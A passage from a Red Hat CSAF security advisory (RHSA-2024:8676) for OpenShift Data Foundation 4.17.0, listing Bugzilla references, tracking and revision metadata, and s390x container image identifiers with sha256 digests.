"https://bugzilla.redhat.com/show_bug.cgi?id=2294723", }, { category: "external", summary: "2297265", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297265", }, { category: "external", summary: "2297295", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297295", }, { category: "external", summary: "2297447", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297447", }, { category: "external", summary: "2297454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2297454", }, { category: "external", summary: "2299630", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2299630", }, { category: "external", summary: "2299639", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2299639", }, { category: "external", summary: "2300021", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300021", }, { category: "external", summary: "2300312", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300312", }, { category: "external", summary: "2300331", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300331", }, { category: "external", summary: "2300499", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2300499", }, { category: "external", summary: "2301889", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301889", }, { category: "external", summary: "2302201", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302201", }, { category: "external", summary: "2302257", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302257", }, { category: "external", summary: "2302448", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302448", }, { category: "external", summary: "2302507", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302507", }, { category: "external", summary: "2302575", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302575", }, { category: "external", summary: "2302774", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302774", }, { category: "external", summary: "2302841", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302841", }, { category: "external", summary: "2302842", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2302842", }, { category: "external", summary: "2303028", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303028", }, { category: "external", summary: "2303342", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303342", }, { category: "external", summary: "2303403", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303403", }, { category: "external", summary: "2303619", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303619", }, { category: "external", summary: "2303820", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303820", }, { category: "external", summary: "2303821", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303821", }, { category: "external", summary: "2303822", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303822", }, { category: "external", summary: "2303823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303823", }, { category: "external", summary: "2303824", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303824", }, { category: "external", summary: "2303825", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303825", }, { category: "external", summary: "2303829", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2303829", }, { category: "external", summary: "2304073", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304073", }, { category: "external", summary: "2304231", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304231", }, { category: "external", summary: "2304232", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304232", }, { category: "external", summary: "2304235", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304235", }, { category: "external", summary: "2304238", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304238", }, { category: "external", summary: "2304799", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304799", }, { category: "external", summary: "2304810", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304810", }, { category: "external", summary: "2304815", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304815", }, { category: "external", summary: "2304993", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2304993", }, { category: "external", summary: "2305274", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305274", }, { category: "external", summary: "2305295", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305295", }, { category: "external", summary: "2305660", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305660", }, { category: "external", summary: "2305880", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2305880", }, { category: "external", summary: "2306026", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306026", }, { category: "external", summary: "2306387", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306387", }, { category: "external", summary: "2306577", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2306577", }, { category: "external", summary: "2307823", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307823", }, { category: "external", summary: "2307835", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307835", }, { category: "external", summary: "2307909", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2307909", }, { category: "external", summary: "2308091", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308091", }, { category: "external", summary: "2308101", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308101", }, { category: "external", summary: "2308144", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308144", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2308304", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308304", }, { category: "external", summary: "2308442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308442", }, { category: "external", summary: "2308446", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308446", }, { category: "external", summary: "2309191", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309191", }, { category: "external", summary: "2309195", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309195", }, { category: "external", summary: "2309485", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309485", }, { category: "external", summary: "2309486", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309486", }, { category: "external", summary: "2309487", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309487", }, { category: "external", summary: "2309488", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309488", }, { category: "external", summary: "2309489", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309489", }, { category: "external", summary: "2309700", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2309700", }, { category: "external", summary: "2310369", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310369", }, { category: "external", summary: "2310385", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310385", }, { category: "external", summary: "2310841", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310841", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311042", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311042", }, { category: "external", summary: "2311043", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311043", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2311468", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311468", }, { category: "external", summary: "2311551", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311551", }, { category: "external", summary: "2311790", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311790", }, { category: "external", summary: "2311867", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311867", }, { category: "external", summary: "2311885", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311885", }, { category: "external", summary: "2311893", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311893", }, { category: "external", summary: "2312137", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312137", }, { category: "external", summary: "2312442", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2312442", }, { category: "external", summary: "2313178", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313178", }, { category: "external", summary: "2313203", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313203", }, { category: "external", summary: "2313515", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313515", }, { category: "external", summary: "2313717", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313717", }, { category: "external", summary: "2313736", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313736", }, { category: "external", summary: "2314200", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314200", }, { category: "external", summary: "2314211", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314211", }, { category: "external", summary: "2314404", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314404", }, { category: "external", summary: "2314454", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314454", }, { category: "external", summary: "2314636", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2314636", }, { category: "external", summary: "2315624", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315624", }, { category: "external", summary: "2315651", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315651", }, { category: "external", summary: "2315666", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315666", }, { category: "external", summary: "2315709", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315709", }, { category: "external", summary: "2315733", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315733", }, { category: "external", summary: "2315846", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2315846", }, { category: "external", summary: "2318490", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2318490", }, { category: "external", summary: "2319102", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2319102", }, { category: "external", summary: "2319238", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2319238", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8676.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Data Foundation 4.17.0 Security, Enhancement, & Bug Fix Update", tracking: { current_release_date: "2025-04-10T00:21:32+00:00", generator: { date: "2025-04-10T00:21:32+00:00", engine: { name: "Red Hat SDEngine", version: "4.4.2", }, }, id: "RHSA-2024:8676", initial_release_date: "2024-10-30T14:25:22+00:00", revision_history: [ { date: "2024-10-30T14:25:22+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-30T14:25:22+00:00", number: "2", summary: "Last updated version", }, { date: "2025-04-10T00:21:32+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHODF 4.17 for RHEL 9", product: { name: "RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17", product_identification_helper: { cpe: "cpe:/a:redhat:openshift_data_foundation:4.17::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Data Foundation", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product: { name: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product_id: "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product: { name: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product_id: "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product: { name: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product_id: "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580?arch=s390x&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product: { name: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product_id: "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product: { name: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product_id: "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product: { name: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product_id: "odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d?arch=s390x&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product: { name: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product_id: "odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product: { name: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product_id: "odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product: { name: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product_id: "odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product: { name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product_id: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product: { name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product_id: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product: { name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product_id: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product: { name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product_id: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310?arch=s390x&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product_id: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product_id: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product: { name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product_id: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61?arch=s390x&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product: { name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product_id: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012?arch=s390x&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product: { name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product_id: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e?arch=s390x&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product_id: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7?arch=s390x&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product_id: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product: { name: 